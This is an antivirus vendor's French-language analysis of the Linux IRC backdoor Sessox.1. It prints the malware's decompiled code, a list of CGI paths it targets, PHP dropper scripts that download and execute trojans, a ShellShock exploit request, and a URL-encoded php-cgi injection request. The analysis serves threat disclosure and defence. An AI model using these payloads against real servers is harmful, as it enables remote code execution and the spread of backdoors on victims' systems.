Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Linux.BackDoor.Sessox.1

Added to the Dr.Web virus database: 2015-04-08

Virus description added:

Trojan backdoor ciblant Linux qui reçoit des commandes via un serveur-chat et utilise IRC (Internet Relay Chat). Après son lancement, il s'enregistre dans l'auto démarrage en utilisant le fichier "/etc/init.d/rc.local" ou, en cas d'absence de ce fichier, "/etc/rc.conf". Puis il lit le contenu de son fichier exécutable "/tmp/Help1", le crypte avec l'algorithme base64 et l'enregistre dans le fichier "/tmp/Help1.z". Il fait la même chose avec les fichiers "/tmp/Help2" et "/tmp/Help2.z". Puis il établit une connexion avec le serveur de gestion en envoyant la requête :

PASS %pass%\nNICK %nick%\nUSER %user% localhost localhost :%uptime%\n

où %pass% - "44", %nick%, %user%, %uptime% possèdent la structure suivante :

char *GetUptime()
{
  char *szUptime;
  signed int i;
  struct sysinfo info;
 
  szUptime = (char *)malloc(0x15u);
  i = 0;
  memset(szUptime, 0, 0x15u);
  do
    szUptime[i++] = rand() % 26 + 'A';
  while ( i < 20 );
  *szUptime = 'm';
  szUptime[1] = 'u';
  szUptime[2] = 'm';
  szUptime[3] = 'u';
  szUptime[4] = '-';
  sysinfo(&info);
  if ( info.uptime > 0xD2F00 )
  {
    szUptime[5] = '[';
    szUptime[6] = '1';
    szUptime[7] = '0';
    szUptime[8] = ']';
    szUptime[9] = '-';
    if ( info.uptime > 0x1A5E00 )
    {
      szUptime[6] = '2';
      if ( info.uptime > 0x278D00 )
      {
        szUptime[6] = '3';
        if ( info.uptime > 0x34BC00 )
        {
          szUptime[6] = '4';
          if ( info.uptime > 0x41EB00 )
          {
            szUptime[6] = '5';
            if ( info.uptime > 0x4F1A00 )
            {
              szUptime[6] = '6';
              if ( info.uptime > 0x5C4900 )
              {
                szUptime[6] = '7';
                if ( info.uptime > 0x697800 )
                {
                  szUptime[6] = '8';
                  if ( info.uptime > 0x76A700 )
                  {
                    szUptime[6] = '9';
                    if ( info.uptime > 0x83D600 )
                    {
                      szUptime[6] = '1';
                      szUptime[8] = '0';
                      szUptime[9] = ']';
                      szUptime[10] = '-';
                      if ( info.uptime > 0xC5C100 )
                      {
                        szUptime[7] = '5';
                        if ( info.uptime > 0x107AC00 )
                        {
                          szUptime[6] = '2';
                          szUptime[7] = '0';
                          if ( info.uptime > 0x18B8200 )
                          {
                            szUptime[6] = '3';
                            if ( info.uptime > 0x20F5800 )
                            {
                              szUptime[6] = '4';
                              if ( info.uptime > 0x2932E00 )
                                szUptime[6] = '5';
                            }
                          }
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
  return szUptime;
}

Il peut exécuter les commandes suivantes :/p>

CommandeValeur
376Régler le mode et accéder à l’IRC
433envoyer au canal IRC des données sur la durée de son fonctionnement sur la machine infectée (uptime)
422Régler le mode et accéder à l’IRC
PINGEnvoyer la réponse PONG
NICKModifier le nick pour celui indiqué dans la commande
PRIVMSGExécuter une des fonctions suivantes (affichées ci-dessous)

Fonctions:

CommandeValeur
PHPSCANLancer le scan des scripts PHP (PHP, Scanner)
SOCKS5Lancer le serveur proxy (SOCKS5 Proxy)
SSSCANLancer un scan pour rechercher la présence de la vulnérabilité ShellShock (ShellShock Scanner)
WEBDOSLancer une attaque sur un site via des requêtes GET répétitives (HTTP Flooder)

Le Trojan peut attaquer un site web indiqué par les malfaiteurs en envoyant à répétition des requêtes GET. Le Trojan Linux.BackDoor.Sessox.1 peut également scanner le serveur pour rechercher la présence de la vulnérabilité ShellShock qui permet de lancer à distance un code aléatoire sur ce serveur. Le Trojan possède une liste de fichiers qui peuvent être insérés dans la requête GET :

/cgi-sys/entropysearch.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-mod/index.cgi
/cgi-bin/test.cgi
/cgi-bin-sdb/printenv
/admin.cgi
/cgi-bin/bash
/cgi-bin/hello
/cgi-bin/helpme
/cgi-bin/info.sh
/cgi-bin/php5-cli?
/cgi-bin/php5?
/cgi-bin/test-cgi
/cgi-bin/test.sh
/cgi-sys/guestbook.cgi
/cgi-sys/php5?
/phppath/cgi_wrapper?
/phppath/php?
/tmUnblock.cgi
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin/signon.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/tools/tools.pl
/phppath/cgi_wrapper
/phppath/php
/cgi-sys/FormMail-clone.cgi
/xul/
/gitweb/
/gitweb.cgi
/cgi-bin/
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php4
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/firmwarecfg
/cgi-bin/%2f/admin.html
/cgi-bin/admin.html
/sys-cgi
/cgi-bin/tree.php
/cgi-bin/w3mman2html.cgi
/cgi-bin/status/status.cgi

Le script suivant est utilisé comme la charge utile lors de l'envoi des requêtes :

$a = \"%s\";
$b = \"%s\";
$c = sys_get_temp_dir();
$d = \"%s\";
$e = \"%s\";
$f = \"chmod 777\";
$g = \"file_put_contents\";
$h = \"system\";
$i = \"file_exists\";
$j = \"fopen\";
if ($i($c . \"/$d\"))
{
     exit(1);
}else{
     echo($c);
     $g(\"$c/$d\", $j(\"$a\", \"r\"));
     $g(\"$c/$e\", $j(\"$b\", \"r\"));
     $h(\"$f \" . $c .\"/$d\");
     $h(\"$f \" . $c .\"/$e\");
     $h($c . \"/$d\");
     $h($c . \"/$e\");
}

Dans ce script, les variables a, b représentent les liens pour télécharger des fichiers de Trojans, les variables d, e représentent les noms sous lesquels il faut sauvegarder ces fichiers.

La requête GET suivante est générée à l'aide de ces données :

GET %file% HTTP/1.0\r\nCookie: () { :;} ;echo;/usr/bin/php -r %script%\r\nReferer: () { :;} ;echo;/usr/local/bin/php -r %script%\r\n\r\n

Où, au lieu de %file%, toutes les variantes de la liste sont triées lors du cycle, et %script% est le script indiqué ci-dessus. Une adresse IP aléatoire est générée en tant qu’hôte pour les requêtes GET.

De la même façon, ce malware peut scanner des scripts PHP à l'aide de requêtes POST spécifiques afin de lancer des scripts sur le serveur. L'adresse IP générée aléatoirement est choisie comme hôte du destinataire. Le script suivant est utilisé pour générer la requête POST :

<?php
$bufferf = '%s';
$bufferf2 = '%s';
$a = sys_get_temp_dir();
$b = \"%s\";
$c = \"%s\";
$d = \"chmod 777\";
$e = \"system\";
$f = \"file_put_contents\";
$g = \"base64_decode\";
$h = \"chmod\";\n$i = \"file_exists\";
if ($i($a . \"/$c\"))
{
  exit(1);
}else{
  echo($a);
  $bufferf = $g($bufferf);
  $bufferf2 = $g($bufferf2);
  $f(\"$a/$b\", $bufferf);
  $f(\"$a/$c\", $bufferf2);
  $h ($a.\"/\".$b,0777);
  $e(\"$d \" . $a .\"/$b\");
  $h ($a.\"/\".$c,0777);
  $e(\"$d \" . $a .\"/$c\");
  $e($a . \"/$c\");
  $e($a . \"/$b\");
  exit(1);
}
?>

où les valeurs des variables bufferf et bufferf2 représentent respectivement les données des fichiers /tmp/Help1.z, /tmp/Help2.z (corps du backdoor en base64), tandis que les valeurs de b et c représentent "Help1", "Help2".

Les fichiers auxquels la requête peut être envoyée :

/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php5-cgi
/cgi-bin/php-cgi.bin

Puis le script est inséré à la requête POST :

POST %file%?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%6E HTTP/1.1\r\nHost: %ip%\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %len%\r\nConnection: close\r\n\r\n%script%

où %file% est le fichier de la liste affichée ci-dessus, %ip% est l'adresse IP aléatoire, %len% est la taille du script, %script% est le script présenté ci-dessus.

News sur cette menace

Recommandations pour le traitement


Linux

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

Version démo gratuite

Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)

Télécharger Dr.Web

Par le numéro de série